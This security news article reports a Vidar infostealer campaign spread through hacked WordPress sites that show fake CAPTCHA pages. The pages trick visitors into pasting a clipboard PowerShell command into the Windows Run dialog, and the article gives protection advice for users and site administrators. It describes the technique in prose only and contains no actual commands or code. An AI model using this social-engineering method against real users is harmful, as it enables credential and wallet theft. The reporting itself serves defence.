Vidar Infostealer Spreads via Hacked WordPress Sites

Malwarebytes researchers have detected an active campaign delivering Vidar infostealer through compromised WordPress websites hosting fake CAPTCHA verification pages. The attack chain, leveraging the ClickFix social engineering technique, has been observed targeting users across Italy, France, the United States, the United Kingdom, and Brazil.

Vidar remains one of the most prevalent infostealers in 2026, consistently ranking among the top four active families alongside LummaC2, ACRStealer, and StealC according to threat tracking data.

How the Attack Works

The infection chain begins when victims visit legitimate but compromised WordPress sites. Attackers inject malicious code that redirects visitors to pages displaying a fake "verify you are human" CAPTCHA prompt. This technique has become increasingly common in malware distribution, exploiting users' familiarity with CAPTCHAs on legitimate websites.

When users attempt to complete the verification, the page instructs them to open a Run dialog (Windows+R) and paste a command that has been automatically copied to their clipboard. The pasted command executes a PowerShell script that downloads and runs the Vidar payload.

This ClickFix approach bypasses traditional security controls because the user manually initiates the malicious command. Endpoint detection tools that rely on monitoring for automated script execution may miss the initial compromise entirely.

What Vidar Steals

Once installed, Vidar targets a broad range of sensitive data:

• Browser credentials and cookies from Chrome, Firefox, Edge, and other browsers
• Cryptocurrency wallet data and seed phrases
• Two-factor authentication app data
• FTP and email client credentials
• Screenshot capture of the victim's desktop
• System information for fingerprinting

The stolen data is exfiltrated to attacker-controlled infrastructure before the malware cleans traces of its presence. Vidar's modular design allows operators to customize which data types they prioritize based on their monetization goals.

WordPress Sites as Attack Infrastructure

The campaign illustrates how attackers weaponize legitimate web infrastructure to distribute malware. WordPress sites are frequently targeted due to the platform's ubiquity and the variable security posture of self-hosted installations. Outdated plugins, weak admin credentials, and misconfigured permissions create opportunities for mass compromise.

Website owners often remain unaware their sites are hosting malicious content until notified by security researchers or hosting providers. The Torg Grabber infostealer campaign we covered recently used similar ClickFix techniques, demonstrating how effective this social engineering approach has become.

Protection Recommendations

For end users:

1. Be skeptical of any website asking you to paste commands into a Run dialog or terminal
2. Legitimate CAPTCHA services never require running system commands
3. Keep browsers and operating systems updated with latest security patches
4. Consider using a password manager that can detect credential theft attempts

For WordPress administrators:

1. Update WordPress core, themes, and plugins immediately when patches release
2. Use strong, unique passwords for admin accounts and enable two-factor authentication
3. Implement a web application firewall to block common attack patterns
4. Regularly scan for malicious code injections in theme and plugin files

Organizations should review our malware defense guide for comprehensive protection strategies against infostealers and other malicious software.

Why This Matters

The ClickFix technique represents an evolution in social engineering that shifts the execution burden to the victim. Traditional drive-by downloads relied on browser vulnerabilities that have become harder to exploit as browser security improved. By convincing users to execute commands themselves, attackers bypass these protections entirely.

Similar to the PureLog stealer campaign targeting German healthcare organizations, Vidar operators demonstrate sophisticated understanding of how to reach victims where they feel safe. The presence of fake CAPTCHA pages on otherwise legitimate websites exploits the trust users place in familiar domains.

Security teams should alert end users about this attack pattern. The unusual request to paste commands should be a red flag, but many users comply without recognizing the danger.